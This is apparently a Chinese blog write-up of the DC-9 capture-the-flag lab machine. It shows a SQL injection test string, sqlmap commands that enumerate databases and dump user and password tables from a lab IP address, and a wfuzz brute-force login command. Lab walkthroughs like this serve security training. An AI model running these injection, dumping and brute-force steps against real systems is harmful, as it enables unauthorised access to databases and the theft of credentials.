案例1:DC-9
图1:
- 尝试 ‘ or 1=1 --+ //判断存在注入
- kali中使用sqlmap工具跑就完了
sqlmap -u "http://192.168.178.135/results.php" --data "search=1" //同样先判断是否存在sql注入
sqlmap -u "http://192.168.178.135/results.php" --data "search=1" --dbs //查看所有的库,发现Staff库,Users库
sqlmap -u "http://192.168.178.135/results.php" --data "search=1" --current-db //查看当前连接的数据库,发现为Staff库
判断先通过Users库入手
sqlmap -u "http://192.168.178.135/results.php" --data "search=1" -D users --tables //查询User库中存在的表,发现UserDetails表
sqlmap -u "http://192.168.178.135/results.php" --data "search=1" -D users -T UserDetails --dump //查询表中数据,发现大量用户及密码的表格
将表中用户名密码复制到notepad++,按ALT键复制用户名密码每列的数据到notepad并使用替换空格去掉空格保存为pass-dict,user-dict字典
使用fuzz爆破——通过上述两个字典
wfuzz -z file,user-dict -z file,pass-dict --hw 87 "http://192.168.142.139/manage.php?username=FUZZ&password=FUZ2Z"
结果未成功,只能通过staff表下手
sqlmap -u "http://192.168.178.135/results.php" --data "search=1" -D Staff --tables //查询Staff 库中存在的表,发现user表
sqlmap -u "http://192.168.178.135/results.php" --data "search=1" -D Staff -T user --dump //查询表中数据,发现密码并按Y进行MD5解密.
从而得到图2的用户名密码
图2:
其他相关参看:sqlmap命令详解 - tooltime - 博客园 (cnblogs.com)
标签:SQLMAP,sqlmap,系列,--,results,192.168,http,强化,php From: https://www.cnblogs.com/boomomg/p/16596957.html